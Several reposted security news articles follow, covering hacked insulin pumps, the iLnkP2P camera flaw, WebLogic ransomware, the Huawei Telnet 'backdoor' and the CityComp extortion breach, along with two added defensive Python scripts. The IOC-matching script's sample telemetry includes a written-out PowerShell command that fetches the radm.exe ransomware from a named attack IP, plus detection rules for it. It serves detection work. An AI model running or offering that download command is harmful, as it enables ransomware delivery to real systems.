STE WILLIAMS

Diabetics are hunting down obsolete insulin pumps with a security flaw

Eight years ago, thanks to 10-year-old code that failed to use encryption to conceal the content of its wireless transmissions, security researcher Barnaby Jack successfully hacked a Medtronic insulin pump and proved it’s feasible to poison a diabetic wearer with a potentially lethal overdose.

If diabetic equipment hackers cared about money, that security flaw would now be worth more than gold. But they don’t.

What the community of people devoted to hacking their way to better diabetes management through homemade, closed-loop systems cares about is helping themselves, their loved ones and each other get past the lag in Food and Drug Administration (FDA) approval of such systems.

Medtronic hasn’t sold those flawed pumps for years. You can still get them, though, and an army of people dedicated to hacking insulin pumps has arisen to source them wherever they can find them, including on an underground market for medical devices that exists in places like eBay, Craigslist, or Facebook.

This is nothing new. Hackers first realized they could exploit the security flaw for a DIY diabetes revolution back in 2014. And on Monday, The Atlantic published a comprehensive look at how they’re hunting down the obsolete, security flaw-ridden devices, which can be used to create artificial pancreases because they’re so conveniently hackable.

DIY pancreas

The pancreas of a Type 1 diabetic doesn’t produce insulin, or doesn’t produce enough, to keep blood sugar levels under control. That lack of control will eventually lead to death if the hormone isn’t administered manually, whether it be through multiple daily injections or via insulin pumps that do it automatically and continuously, feeding a steady drip of insulin through thin, disposable tubing that’s inserted under the skin.

Another crucial part of diabetes care is a continuous glucose monitor (CGM), a sensor that measures blood sugar levels and also slips just under the skin.

Tie together insulin delivery with CGM data, throw in some algorithms that can dynamically respond to rising and falling blood sugar by adjusting insulin delivery, and you’ve got an artificial pancreas. The idea is like the promised land to Type 1 diabetics: without the need to continuously monitor blood sugar levels, they can actually sleep through the night.

Many now can’t, given how CGM alerts jolt them awake and call them to action, be it eating something to fend off low blood sugar (potentially lethal) or administering more insulin to fend off high blood sugar (also dangerous and potentially lethal).

It’s not that we don’t have all the hardware components now. We had the components to create an artificial pancreas back in 2014, as well. The problem was, and still is, that the pumps couldn’t talk to the sensors. That’s where the Medtronic pump’s security flaw came in.

The hackers realized they could exploit that flaw to override the programming in the old Medtronic pumps, substituting their own algorithm that automatically calculates insulin doses based on real-time glucose data. As the Atlantic puts it, it closed the feedback loop.

Multiple looping systems now available

The hackers made the code available online as OpenAPS – the Open Artificial Pancreas System project – and homemade “looping” was born. Besides OpenAPS, there’s also now another system called Loop. There are communities that have grown up around the technologies to help what the Atlantic says are now thousands of people who are experimenting with DIY artificial pancreas systems.

The FDA hasn’t officially approved any of them. That isn’t stopping diabetics and their helpers, though, whose war cry is #WeAreNotWaiting.

As word has spread, the old, compatible Medtronic pumps have gotten ever tougher to hunt down. The Atlantic spoke to one diabetic who got lucky enough to win one in a periodic raffle held by an online group for diabetics – that’s how coveted they are.

Aren’t these diabetics frightened of malicious Wi-Fi hacks?

When Jack first hacked the Medtronic back in 2011, the news was met with alarm, as are any security flaws that could lead to somebody dying. It was yet another example of how the FDA wasn’t taking the issue of medical device hacking seriously, critics said.

But the remote possibility that somebody’s going to scan for their pump’s serial number and get physically close enough to remotely take it over doesn’t come close to offsetting the relief that loopers get from being able to simply relax when it comes to the constant vigilance that is the lot of diabetics. The Atlantic quotes one looper, Doug Boss, who said that the everyday risks of high and low blood sugar are a lot more real than the possibility of a malicious hacker lurking around a corner:

If I drink coffee in the morning and forget to enter it into my phone, my blood sugar is going to be higher than normal.

Thank you, Barnaby Jack

It’s not often that we get the chance to write about the upside of a security flaw… if ever. This is the most positive one I’ve ever run across, at any rate. And it’s a welcome opportunity to thank the ingenious Barnaby Jack for calling the world’s attention to a security flaw that could have caused harm but did the opposite.

Barnaby Jack passed away in 2013. We lost you too soon, Mr. Jack, but as time goes on, we grow ever more grateful for your contributions.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/K8LO_XyF_YA/

Millions of consumer smart devices exposed by serious security flaw

A security researcher has discovered severe flaws in an Internet of Things (IoT) software feature called iLnkP2P, which renders the millions of consumer devices using it vulnerable to remote discovery and hijack.

Publicised by Paul Marrapese, neither iLnkP2P nor the Chinese company that developed it, Shenzhen Yunni Technology, will be familiar names to the people buying the products containing it.

Despite this, iLnkP2P was identified in at least two million devices made by companies including HiChip, TENVIS, SV3C, VStarcam, Wanscam, NEO Coolcam, Sricam, Eye Sight, and HVCAM.

The software’s purpose is to allow IoT devices such as security webcams, baby monitors, and smart doorbells to be configured quickly without having to know how to open ports in a broadband router’s firewall.

Instead, consumers can power on their new device and instantly connect to it in peer-to-peer (P2P) fashion using an app on their computer by entering a Unique Identifier (UID). Nice and easy to use but not, it turns out, a good architecture from a security point of view.

The flaws

The main iLnkP2P flaw is CVE-2019-11220, which for understandable reasons Marrapese doesn’t dwell on but he says allows attackers to carry out man-in-the-middle attacks and steal device passwords on the way to a device takeover.

However, it’s the second flaw, CVE-2019-11220, that allows attackers to discover which devices are vulnerable to the above weakness and reach out to them even when they’re on the other side of an apparently secure firewall using Network Address Translation (NAT).

Most of the devices don’t appear to use encryption. Marrapese even accuses one vendor of lying about the state of the encryption they use.

Any device using iLnkP2P is at risk. The easiest way to determine whether a device is using it is to look for the UID printed on a sticker on the side of the device: the UID’s prefix (its first three or four letters) can then be checked against the list of 91 known UID prefixes published by Marrapese.

However, this list isn’t exhaustive – there could be further devices not listed that are using iLnkP2P and have different UIDs.

Fixing the hole

For owners of these devices, there don’t appear to be many mitigations beyond manually blocking the software’s UDP port, 32100. This will allow local access while blocking remote traffic. Alternatively, writes Marrapese:

Buy a new device from a reputable vendor. Research suggests that a fix from vendors is unlikely, and these devices are often riddled with other security problems that put their owners at risk.
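To verify that a router-level block of UDP port 32100 is actually working, or to find devices on the network that are still reaching out, a defender can look for that port in flow or firewall logs. The following Python is an added example written for this page, not code from Marrapese or from any device vendor: it classifies constructed flow records by whether UDP/32100 traffic stays on the local network (the traffic the block is meant to keep working) or leaves it. The local-network ranges and the sample flows are assumptions made for the example.

```python
"""Flag local devices whose UDP/32100 traffic leaves the local network.

Added example for this page, not code from Marrapese or any device vendor.
The port number comes from the article; the local-network ranges and the flow
records are assumptions constructed for the example.
"""
import ipaddress
from typing import Dict, Iterable, List, Tuple

ILNKP2P_PORT = 32100  # UDP port the article says iLnkP2P uses

# Networks treated as "local" for the purpose of the block (assumption: RFC 1918 plus loopback).
LOCAL_NETS = [ipaddress.ip_network(n) for n in
              ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Constructed flow records: (src_ip, src_port, dst_ip, dst_port, protocol).
Flow = Tuple[str, int, str, int, str]
SAMPLE_FLOWS: List[Flow] = [
    ("192.168.1.50", 40123, "203.0.113.10", 32100, "udp"),  # camera -> outside rendezvous host
    ("192.168.1.50", 40124, "192.168.1.1", 32100, "udp"),   # camera -> phone app on the LAN (kept)
    ("192.168.1.77", 51000, "198.51.100.7", 443, "tcp"),    # ordinary HTTPS, not of interest
    ("10.0.0.9", 32100, "203.0.113.10", 32100, "udp"),      # second device on another subnet
    ("192.168.1.50", 40125, "203.0.113.11", 32100, "udp"),  # same camera, another outside host
]


def is_local(ip: str) -> bool:
    """True if the address falls inside one of LOCAL_NETS."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in LOCAL_NETS)


def is_remote_p2p_flow(flow: Flow) -> bool:
    """UDP/32100 from a local source to a non-local destination: the traffic the block should stop."""
    src, _sport, dst, dport, proto = flow
    if proto != "udp" or dport != ILNKP2P_PORT:
        return False
    return is_local(src) and not is_local(dst)


def find_exposed_devices(flows: Iterable[Flow]) -> Dict[str, List[str]]:
    """Map each local source IP to the outside hosts it reached on UDP/32100, in log order."""
    exposed: Dict[str, List[str]] = {}
    for flow in flows:
        if is_remote_p2p_flow(flow):
            exposed.setdefault(flow[0], []).append(flow[2])
    return exposed


if __name__ == "__main__":
    for host, peers in find_exposed_devices(SAMPLE_FLOWS).items():
        print(f"{host} reached {sorted(set(peers))} on UDP/{ILNKP2P_PORT}; the block is not effective for this host")
```

On a real network the flow records would come from the router or firewall’s flow export rather than a hard-coded list; the check keys on the destination port because the device initiates the connection, and since the protocol is UDP any replies ride the same flow, so stopping the outbound side is enough.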

Sure enough, when Marrapese contacted the affected makers several times between January and February, he heard nothing back.

And that’s the thing about so many IoT devices, especially ones made cheaply and quickly by manufacturers who seem more concerned with shifting units than worrying about aftersales. The fact that a flaw exists – and a big flaw at that – has no bearing on whether it will ever be patched.

Pessimistic perhaps but it’s a fundamental issue. Anyone buying a product that can’t or won’t be updated is buying something with a very short life expectancy.

It’s sometimes said that users don’t care enough about security to take action in their own interests but it’s hard to believe that anyone buying a webcam trained on the inside of their house would be happy at the thought of cybercriminals taking control of it.

This follows a wearying series of IoT security scares, including that many of the apps used to control these devices have security weaknesses of their own.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/E1nzOCxEsYE/

Keeping your data safe when traveling

Our whole lives and livelihoods are wrapped up in our data.

That data is especially vulnerable at border crossings and in unfamiliar environments.

There are plenty of security products available on the internet for the privacy-minded traveler – if you feel like going shopping, a quick search will turn those up for you.

And if you really want an excuse to travel with a laptop and phone that you’ll acquire solely for your trip and then dispose of when you leave, you certainly can, but most people won’t.

But here are some tips you can use without spending tons of money on extra security gear.

Getting there – keep it encrypted, and travel light

If you need to bring data with you, make sure it’s encrypted with full disk encryption, and that your computer is turned off – not merely on standby – so that there are no encryption keys left in memory.

Keep in mind that border officials in some countries can require you turn on and unlock your devices, and they may be allowed to make and keep copies of your data, as a condition of entry.

If you refuse you might be denied entry, or even detained. So think of encryption more as protection from data loss should your hard drive or machine be stolen or physically lost.

If this is unacceptable to you, travel light and leave your devices and their data at home.

It depends on what’s at risk for you and what your tolerance for risk is, but the less you have with you, the less you have to lose.

When you’re there, mind what you connect to

Think before you charge a device using a USB port on someone else’s device, even if it looks like a plain old charger.

Consider carrying a cable or adapter of your own that you know has only its power wires connected – if the USB data wires are missing from the cable, it can’t be used to sneak data onto or off your device.

Also, if you rent a car, avoid pairing your phone with its computer system, no matter how convenient that might be. You may end up leaving behind more than you intended, including your device name, contact data and call details.

When it comes to accessing data remotely, stick to basic internet hygiene procedures.

Avoid accessing sensitive services via public access points, and consider using a VPN to encrypt all your network traffic (if local regulations allow) back to your home or company network to reduce the amount you leak out to eavesdroppers.

Final note

If you’re traveling abroad and not bringing any of your kit with you but plan on accessing your cloud-based services from a new computer, remember that your new device and new geolocation could trigger security alerts on your account.

At the very least, if you have 2FA (two-factor authentication) enabled on your account (and you should if you have the option!), make sure you have your token generator or phone with you so you can get access.

If you use SMS to receive your 2FA codes, you’ll want to be sure your phone plan allows you to receive SMS while abroad. (This is something you can resolve while abroad, but it’s a lot easier to take care of before you leave, speaking from personal experience.)

Similar advice applies if you use a password manager: make sure you have the tools to access it on the go, such as the token generator if it’s locked with 2FA.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/lSQuWuTFMfA/

If you’re using Oracle’s WebLogic Server, check for security fixes: Bug exploited in the wild to install ransomware

IT admins overseeing Oracle’s WebLogic Server installations need to get patching immediately: miscreants are exploiting what was a zero-day vulnerability in the software to pump ransomware into networks.

The Cisco Talos security team said one of its customers discovered it had been infected via the bug on April 25, though the exploit is believed to have been kicking around the web since April 17. The programming blunder at the heart of the matter is a deserialization vulnerability that can be exploited to execute malicious code on a remote WebLogic server with no username or password needed. A hacker just needs to be able to reach the at-risk service across the internet or network to infiltrate it.

“WebLogic’s design makes it particularly prone to these types of vulnerabilities,” said Johannes Ullrich, dean of research at the SANS Technology Institute, in an advisory this week. “Do not expose WebLogic to the Internet if you can help it. I doubt that this was the last such vulnerability.”

The flaw was first identified by Chinese and Taiwanese researchers, and the first official alert was sent out by China’s National Vulnerability Database and assigned CVE-2019-2725. Oracle rushed out an out-of-band patch on Friday, April 26, rating it 9.8 out of 10 on the severity scale and urged everyone to get patching – although Big Red being what it is, you’ll need a suitable support contract to get the fix, it appears.

As Ellison and Co put it: “Patches released through the Security Alert program are provided only for product versions that are covered under the Premier Support or Extended Support phases of the Lifetime Support Policy. Oracle recommends that customers plan product upgrades to ensure that patches released through the Security Alert program are available for the versions they are currently running.

“Product releases that are not under Premier Support or Extended Support are not tested for the presence of vulnerabilities addressed by this Security Alert. However, it is likely that earlier versions of affected releases are also affected by these vulnerabilities. As a result, Oracle recommends that customers upgrade to supported versions.”

A brand new nasty

According to the Talos team, miscreants were spotted using the WebLogic flaw to inject ransomware called Sodinokibi into at least one corporate network. Once they were able to execute code on a vulnerable system, the hackers pulled the file-scrambling malware down from two IP addresses – 188.166.74[.]218 and 45.55.211[.]79. The former is a known host for malicious software, though the latter appears to be linked to a legit website in Chile that was pwned to act as a launch pad for the attack.


Specifically, the criminals used PowerShell on vulnerable Windows-based boxes to download a file dubbed radm.exe, which contained the ransomware. Once run, it disabled the default Windows backup mechanisms, to make recovery harder, mass-encrypted documents, and then opened a window demanding a payment in Bitcoin that would double if not paid within three days.

Eight hours after the initial attack, the malware operators returned to download and run a second piece of malware, Gandcrab v5.2, which was released on February 19 this year.
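The indicators the article names (the two download IPs and the radm.exe filename) and the behaviour it describes (a WebLogic server’s Java process spawning PowerShell to fetch a file) translate directly into detection rules a SOC can run over proxy and process-creation telemetry. The Python below is an added example written for this page, not code from Talos, Oracle or The Register; the event format, the host names and the sample lines are constructed, and the assumption that WebLogic runs as java.exe on Windows is the example’s, not the article’s.

```python
"""Match the indicators from the Talos write-up against sample telemetry.

Added example for this page, not code from Talos, Oracle or The Register.
The two download IPs and the radm.exe filename come from the article; the
event format, host names and sample lines are constructed, and the parent
process name "java.exe" is an assumption about how WebLogic runs on Windows.
"""
import re
from typing import Dict, List, Tuple

# Indicators named in the article (defanging brackets removed so they match raw logs).
IOC_IPS = {"188.166.74.218", "45.55.211.79"}
IOC_FILENAMES = {"radm.exe"}
# Shell interpreters an application server's Java process has no business launching (assumption).
SHELLS = {"powershell.exe", "cmd.exe"}
WEBLOGIC_PARENT = "java.exe"

# Constructed telemetry: "proxy" egress records and "proc" process-creation records.
SAMPLE_EVENTS = [
    'proxy src=10.1.2.3 dst=188.166.74.218 dport=80 url=/radm.exe',
    'proxy src=10.1.2.3 dst=93.184.216.34 dport=443 url=/',
    r'proc host=weblogic01 parent=java.exe image=powershell.exe cmdline="powershell.exe -Command Invoke-WebRequest http://45.55.211.79/radm.exe -OutFile C:\Windows\Temp\radm.exe"',
    'proc host=weblogic01 parent=services.exe image=svchost.exe cmdline="svchost.exe -k netsvcs"',
    'proc host=weblogic01 parent=java.exe image=cmd.exe cmdline="cmd /c whoami"',
]

KV_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')


def parse_event(line: str) -> Dict[str, str]:
    """Split 'kind key=value key="quoted value"' into a dict; the first token is the kind."""
    kind, _, rest = line.partition(" ")
    fields = {"kind": kind}
    for m in KV_RE.finditer(rest):
        fields[m.group(1)] = m.group(3) if m.group(3) is not None else m.group(2)
    return fields


def match_rules(ev: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event triggers, in evaluation order."""
    hits: List[str] = []
    cmd = ev.get("cmdline", "")
    # Network indicator: any egress to one of the two download hosts.
    if ev.get("dst") in IOC_IPS:
        hits.append("egress_to_known_c2")
    if ev["kind"] == "proc":
        # Behavioural rule: the application server's Java process spawning a shell.
        if ev.get("image", "").lower() in SHELLS and ev.get("parent", "").lower() == WEBLOGIC_PARENT:
            hits.append("java_spawned_shell")
        if any(ip in cmd for ip in IOC_IPS):
            hits.append("cmdline_references_known_c2")
    # File indicator: payload name in a requested URL or in a command line.
    haystack = (ev.get("url", "") + " " + cmd).lower()
    if any(name in haystack for name in IOC_FILENAMES):
        hits.append("known_payload_filename")
    return hits


def scan_events(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Return (line index, triggered rules) for every line that matched at least one rule."""
    findings: List[Tuple[int, List[str]]] = []
    for i, line in enumerate(lines):
        hits = match_rules(parse_event(line))
        if hits:
            findings.append((i, hits))
    return findings


if __name__ == "__main__":
    for idx, hits in scan_events(SAMPLE_EVENTS):
        print(f"line {idx}: {', '.join(hits)}")
```

The behavioural rule is the one worth keeping after the IP addresses have rotated: a Java application server launching cmd.exe or PowerShell is rare in normal operation and is how a deserialization exploit of this kind shows up on the host, whichever file it goes on to fetch.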

“We find it strange the attackers would choose to distribute additional, different ransomware on the same target,” said Team Talos. “Sodinokibi being a new flavor of ransomware, perhaps the attackers felt their earlier attempts had been unsuccessful and were still looking to cash in by distributing Gandcrab.”

The team – Pierre Cadieux, Colin Grady, Jaeson Schultz, and Matt Valites – said Talos was able to help its customer clean up the infection, but warned that many more are likely to come. Given the large number of WebLogic servers out there, this attack vector is bound to be reused. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/05/01/oracle_weblogic_attack/

NordVPN rapped by ad watchdog over insecure public Wi-Fi claims

NordVPN has been told to stop misleading world+dog with claims in telly ads that public Wi-Fi is inherently insecure.

Britons will be familiar with NordVPN’s recent ad spot, which featured some credulous loon in a railway carriage handing out his credit card, phone, passwords and so on to random strangers.

The Advertising Standards Authority, a private company based in central London that is funded by a levy on the advertising industry, has now told NordVPN not to repeat the advert’s claims that public Wi-Fi is so insecure that it amounts to handing out your personal details to everyone around you.

Nine people complained about the advert, which was broadcast in the first quarter of this year.


Justifying its claims, NordVPN told the ASA that HTTPS encryption of webpages “did not mean the site was legitimate, nor was it any proof that the site had been security-hardened against intrusion from hackers”. It added that “most public Wi-Fi hotspots were considered insecure since the majority had very primitive security parameters and non-existent or very weak passwords available to everyone.”

Disagreeing, the ASA acknowledged in a public ruling that while “such data threats could exist”, it “considered the overwhelming impression created by the ad was that public networks were inherently insecure and that access to them was akin to handing out security information voluntarily.”

“Because the ad created the impression that users were at significant risk from data theft, when that was not the case, we concluded it was misleading,” concluded adland’s gummy-mouthed self-regulator.

The ruling comes not long after Reg readers got in touch after noticing NordVPN’s app generating some strange traffic to unregistered web domains.

Earlier this month, UK ISP Cityfibre lost a judicial review it brought against the ASA over how fibre broadband is advertised by its commercial rivals. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/05/01/nordvpn_tv_ad_rapped_advertising_standards_authority/

Julian Assange jailed for 50 weeks over Ecuador embassy bail-jumping

Former WikiLeaker-in-chief Julian Assange has been sentenced to 11 months in prison after jumping bail and fleeing into Ecuador’s London embassy for more than seven years.

Delivering sentence at Southwark, her honour Judge Deborah Taylor said: “Your continued residency [in Ecuador’s London embassy] has cost £16m of taxpayers’ money. No one is above the reach of the law.”

Announcing her sentence of 50 weeks – two weeks short of the maximum punishment she could impose – HHJ Taylor said: “It’s difficult to envisage a more serious example of this offence.”

“I have taken into account all that has been said on your behalf in mitigation, including the background history of this case which has been set out in some detail,” said HHJ Taylor as she summed up the case against Assange.

“Whilst you may have had fears as to what may happen to you, nonetheless you had a choice, and the course of action you chose was to commit this offence in the manner and with the features I have already outlined. In addition, I reject the suggestion that your voluntary residence in the Embassy should reduce any sentence. You were not living under prison conditions, and you could have left at any time to face due process with the rights and protections which the legal system in this country provides.”

Assange’s barrister, Mark Summers, told the court that Assange had feared “further removal to Sweden and the US” if he was jailed in the UK – a fear that, ironically, is now coming to pass with tomorrow’s scheduled extradition hearing at Westminster Magistrates’ Court.

“He feared being kidnapped wherever he was in the world and taken to US, renditioned. There were calls for his execution and assassination,” said Summers, adding: “As a result of those actions and the limited choices he had to protect himself against that risk, he has suffered great consequences, he has spent seven years in confined conditions that may or may not be equated to that of prison.”

Sporting a trimmed beard and neater haircut than in the famous footage and pictures of him being dragged from the Ecuadorean embassy, Assange himself sat blank-faced, locked in the dock, as the lawyers argued for and against him.

Expressing remorse, Assange had also written a letter to the judge, which was handed up to her in court and read out.

The longest sentence that the one-time cupboard-dweller could have faced is 12 months in prison. Under current British sentencing laws, that would have been automatically halved in any event.

Assange will spend a maximum of 22 weeks in prison. Having spent almost three weeks (20 days) on remand, that time is deducted from his full sentence.

It is unlikely that he will be released from British custody while the US extradition proceedings against him are ongoing, having already presented himself as a flight risk to the British authorities.

Assange’s supporters chanted “shame on you” as the Australian was led to the cells. He will appear in custody at Westminster Magistrates’ Court tomorrow to begin his extradition battle against the US authorities. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/05/01/julian_assange_sentenced_50_weeks_jumping_bail/

Oh dear. Secret Huawei enterprise router snoop ‘backdoor’ was Telnet service, sighs Vodafone

A claimed deliberate spying “backdoor” in Huawei routers used in the core of Vodafone Italy’s 3G network was, in fact, a Telnet-based remote debug interface.

The Bloomberg financial newswire reported this morning that Vodafone had found “vulnerabilities going back years with equipment supplied by Shenzhen-based Huawei for the carrier’s Italian business”.

“Europe’s biggest phone company identified hidden backdoors in the software that could have given Huawei unauthorized access to the carrier’s fixed-line network in Italy,” wailed the newswire.

Unfortunately for Bloomberg, Vodafone had a far less alarming explanation for the deliberate secret “backdoor” – a run-of-the-mill LAN-facing diagnostic service, albeit a hardcoded undocumented one.

“The ‘backdoor’ that Bloomberg refers to is Telnet, which is a protocol that is commonly used by many vendors in the industry for performing diagnostic functions. It would not have been accessible from the internet,” said the telco in a statement to The Register, adding: “Bloomberg is incorrect in saying that this ‘could have given Huawei unauthorized access to the carrier’s fixed-line network in Italy’.

“This was nothing more than a failure to remove a diagnostic function after development.”

It added the Telnet service was found during an audit, which means it can’t have been that secret or hidden: “The issues were identified by independent security testing, initiated by Vodafone as part of our routine security measures, and fixed at the time by Huawei.”

Huawei itself told us: “We were made aware of historical vulnerabilities in 2011 and 2012 and they were addressed at the time. Software vulnerabilities are an industry-wide challenge. Like every ICT vendor we have a well-established public notification and patching process, and when a vulnerability is identified we work closely with our partners to take the appropriate corrective action.”

Prior to removing the Telnet server, Huawei was said to have insisted in 2011 on using the diagnostic service to configure and test the network devices. Bloomberg reported, citing a leaked internal memo from then-Vodafone CISO Bryan Littlefair, that the Chinese manufacturer thus refused to completely disable the service at first:

Vodafone said Huawei then refused to fully remove the backdoor, citing a manufacturing requirement. Huawei said it needed the Telnet service to configure device information and conduct tests including on Wi-Fi, and offered to disable the service after taking those steps, according to the document.

El Reg understands that while Huawei indeed resisted removing the Telnet functionality from the affected items – broadband network gateways in the core of Vodafone Italy’s 3G network – this was done to the satisfaction of all involved parties by the end of 2011, with another network-level product de-Telnet-ised in 2012.

Broadband network gateways in 3G UMTS mobile networks are described in technical detail in this Cisco (sorry) PDF. The devices are also known as Broadband Remote Access Servers and sit at the edge of a network operator’s core.

The issue is separate from Huawei’s failure to fully patch consumer-grade routers, as exclusively revealed by The Register in March.

Plenty of other things (cough, cough, Cisco) to panic about

Characterising this sort of Telnet service as a covert backdoor for government spies is a bit like describing your catflap as an access portal that allows multiple species to pass unhindered through a critical home security layer. In other words, massively over-egging the pudding.

Many Reg readers won’t need it explaining, but Telnet is a routinely used method of connecting to remote devices for management purposes. When deployed with appropriate security and authentication controls in place, it can be very useful. In Huawei’s case, the Telnet service wasn’t facing the public internet, and was used to set up and test devices.

Look, it’s not great that this was hardcoded into the equipment and undocumented – it was, after all, declared a security risk – and had to be removed after some pressure. However, it’s not quite the hidden deliberate espionage backdoor for Beijing that some fear.

Twitter-enabled infoseccer Kevin Beaumont also shared his thoughts on the story, highlighting the number of vulns in equipment from Huawei competitor Cisco, a US firm:

For example, a pretty bad remote access hole was discovered in some Cisco gear, which the mainstream press didn’t seem too fussed about. Ditto hardcoded root logins in Cisco video surveillance boxes. Lots of things unfortunately ship with insecure remote access that ought to be removed; it’s not evidence of a secret backdoor for state spies.

Given Bloomberg’s previous history of trying to break tech news, when it claimed that tiny spy chips were being secretly planted on Supermicro server motherboards – something that left the rest of the tech world scratching its collective head once the initial dust had settled – it may be best to take this latest revelation with a pinch of salt. Telnet wasn’t even mentioned in the latest report from the UK’s Huawei Cyber Security Evaluation Centre, which savaged Huawei’s pisspoor software development practices.

While there is ample evidence in the public domain that Huawei is doing badly on the basics of secure software development, so far there has been little that tends to show it deliberately implements hidden espionage backdoors. Rhetoric from the US alleging Huawei is a threat to national security seems to be having the opposite effect around the world.

With Bloomberg, an American company, characterising Vodafone’s use of Huawei equipment as “defiance” showing “that countries across Europe are willing to risk rankling the US in the name of 5G preparedness,” it appears that the US-Euro-China divide on 5G technology suppliers isn’t closing up any time soon. ®

Bootnote

This isn’t shaping up to be a good week for Bloomberg. Only yesterday High Court judge Mr Justice Nicklin ordered the company to pay up £25k for the way it reported a live and ongoing criminal investigation.


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/04/30/huawei_enterprise_router_backdoor_is_telnet/

Extortionist hacks IT provider used by the stars of tech and big biz, leaks customer info after ransom goes unpaid

A service provider hired by the likes of Oracle, SAP, BT, and many others, to manage their IT systems has been hacked – and its client data held to ransom.

At the turn of this month, Germany-based CityComp was broken into by a miscreant, who pinched troves of private information from its customer database and threatened to publicly reveal all that stolen data unless a ransom was coughed up.

The hacker, going by the name Boris, told The Register that right now a partial sample of the swiped info is available to download from a Tor-hidden dark web site, and because the ransom of $5,000 was not paid by CityComp, the full archives are set to be released today.

CityComp boasts it looks after “more than 70,000 servers and storage systems of all types and sizes in up to 75 countries. In addition, we provide support for more than 500,000 client hardware (PC, workstation, printer, cash register).”

In other words, it’s hired to install, maintain, repair, and remove IT equipment for scores of companies, ranging from Oracle, SAP, BT, Toshiba, VW and Airbus to Porsche, Hugo Boss, Ericsson and ATOS.

According to Register sources who have seen the partially leaked information, the data so far includes things like contact information for CityComp’s customers – such as names, email addresses and phone numbers – notes of meetings with clients, and IT equipment inventories, such as model numbers, specifications, and serial numbers. How much is available to download depends on the victim: some have a few spreadsheets of contact details leaked, and some have what’s said to be long lists of installed computer gear and other documentation.

This information could be useful to criminals seeking any inside information to pull off targeted cyber-attacks against certain corporations. We’re not talking direct identity theft, here.

According to Boris, “312,570 files in 51,025 folders, over 516 Gb data financial and private information on all clients, include VAG, Ericsson, Leica, MAN, Toshiba, UniCredit, British Telecom and etc,” was stolen from the German service provider.


Swag … Screenshot of dark-web site offering some of the stolen materials for download, redacted for privacy reasons (Credit: Register sources)

Michael Bartsch, of infosec outfit Deutor, which has been drafted in to handle the aftermath of CityComp’s network intrusion, told El Reg “the stolen data is mostly data about hardware inventories, like hardware type, OS, memory, serial numbers, etc. Only a few personal data records were affected.”

Bartsch, who has been authorized to speak on behalf of CityComp, also confirmed that while the cyber-break-in has been thwarted, affected servers unplugged, and security shored up, more customer information may well leak out beyond what’s already available because CityComp “does not yield to blackmail.” German cops and prosecutors have also been alerted, we’re told:

CityComp Service GmbH was the victim of a targeted cyberattack in early April 2019. A still unknown perpetrator has stolen customer data of CityComp and threatened the company with publication, should it not comply with the blackmail attempt.

CityComp, with the help and support of external experts and the State Criminal Police Office of Baden-Württemberg, successfully fended off the attack and implemented supplementary security measures on all systems. The incident analysis of Deutor Cyber Security Solutions GmbH, G DATA Advanced Analytics GmbH and the Federal State Police Baden-Württemberg showed that at no point was there any indication of a risk of further infection of customer and partner systems, but for security reasons some of the systems have nevertheless been disconnected.

Since CityComp does not comply with blackmail, the publication of customer data could not be prevented. The stolen data has now been published by the perpetrators and CityComp's customers have been informed about it.

In cooperation with the State Office for Criminal Investigation Baden-Württemberg, suitable measures for prosecution were initiated. At an early stage CityComp was transparent and informed the relevant data protection authorities and customers about the cyberattack and data theft. Full transparency was in place right from the start.

Due to this cyber-attack CityComp has implemented further technical and organizational measures to increase its security in order that such an attack will not occur again in the future.

Finally, Boris told us that CityComp at first showed interest in paying the ransom in exchange for his or her silence and the technical details of the intrusion, but it appears that once the service provider learned which vulnerability the hacker had exploited to steal the information, it backed out, fixed the hole, and refused to pay. Boris claimed many companies cough up the cash to keep leaks private and holes patched when he or she contacts them.

“At the beginning of our communication, they [CityComp] agreed that they will pay for our work and we will help them to eliminate vulnerabilities in their network, but they deceived us,” said Boris. “Many companies pay us for our work, and we do not publish data and help them to eliminate vulnerabilities.”

We’ve contacted many of CityComp’s customers affected by this security breach, first reported earlier today by Motherboard, including Oracle, BT, Airbus, Ericsson, Hugo Boss, NH Hotels, and Toshiba. Spokespeople were not available for immediate comment. ®

Additional reporting by Iain Thomson.


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/04/30/citycomp_hacked/

Don’t be Russian to judgement but… Bloke accused of $1.5m+ tax filing biz hack, fraud

A Russian citizen has been charged with defrauding US taxpayers out of at least $1.5m through a series of tax-return hacks.

Anton Bogdanov, 33, was formally charged this week with wire fraud conspiracy, aggravated identity theft and computer intrusion at federal court in Brooklyn, having been arrested in Thailand in November and extradited to America last month.

Bogdanov and his unnamed co-conspirators are accused of obtaining stolen personal information, such as Social Security numbers and dates of birth. Where exactly this info came from isn't mentioned. Between June 2014 and November 2016, this sensitive data was allegedly used by the Russian and his pals to log into taxpayers' profiles on the IRS.gov website, which at the time relied on exactly that kind of personal data to verify identity.

Once in, the miscreants would have access to past tax returns filed by their victims, and they used this data to make further false tax filings on their victims’ behalf, according to the Feds. Crucially, these new filings were written in a way that diverted tax refunds to prepaid debit cards, which prosecutors claim were controlled by Bogdanov.

The US government also asserts Bogdanov hacked into the computer network of an unnamed third-party tax filing company based in New York state by exploiting a security hole in the remote access software the company uses for its employees.

He is accused of using this illegal access to download previous tax returns for an unspecified number of individuals and exploit the information from those returns – including not only Social Security numbers and birthdays but also income and claimed expenses – to craft plausible tax returns on victims’ behalf from which they would receive tax rebates, the charges state.

The rebates were then sent to debit cards in the US that Bogdanov and his co-conspirators had set up, it is claimed. Over the course of two years, they accumulated $1.5m in rebates, the indictment [PDF] alleged. A percentage of the proceeds was wired to Bogdanov in Russia, the US government insists.

The scam went unnoticed for over two years before access was cut off. It's not clear how it was spotted: whether the individuals affected complained, or the tax filing company noticed unusual behavior on its network.

Typically, Uncle Sam takes tax evasion extremely seriously – if you are an individual; if you’re a corporation, less so. As do tax filing companies like Intuit and HR Block: because if anyone is going to rip-off US citizens through their tax filing software, it is going to be the tax filing companies, OK Anton?

